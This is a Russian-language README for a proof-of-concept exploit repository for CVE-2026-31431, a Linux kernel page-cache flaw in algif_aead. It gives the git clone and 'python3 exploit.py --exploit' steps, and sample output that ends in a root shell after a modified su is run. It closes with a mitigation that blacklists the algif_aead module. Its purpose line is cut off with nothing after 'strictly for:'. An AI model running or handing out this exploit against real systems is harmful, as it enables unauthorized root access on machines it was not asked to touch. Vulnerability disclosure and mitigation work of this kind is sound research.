
CVE-2026-31431 — Уязвимость страничного кэша ядра Linux
Этот проект предоставляется строго для:
Автор и соавторы НЕ несут ответственности за неправомерное использование, ущерб, потерю данных, прерывание работы сервисов или любые незаконные действия, совершённые с использованием данного программного обеспечения.
Исследовательский инструмент класса proof-of-concept для CVE-2026-31431, также известного как "Copy Fail", — уязвимости ядра Linux, затрагивающей реализацию AEAD в algif_aead / authencesn.
Уязвимость может приводить к повреждению page cache при определённых условиях, что потенциально может привести к локальному повышению привилегий на уязвимых системах.
Клонируйте репозиторий:
git clone https://github.com/Lutfifakee-Project/CVE-2026-31431.git
cd CVE-2026-31431
python3 exploit.py
python3 exploit.py --exploit
При появлении запроса:
Type 'YES' to continue
python3 exploit.py --cleanup
python3 exploit.py --help
$ python3 exploit.py --exploit
[!] DANGER ZONE: Exploit mode
Type 'YES' to continue: YES
[*] CVE-2026-31431 Copy Fail Exploit
[+] Page cache patching complete!
[+] Executing modified su...
# id
uid=0(root) gid=1001(user)
Если вы системный администратор и вам необходимо снизить риск эксплуатации:
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo rmmod algif_aead 2>/dev/null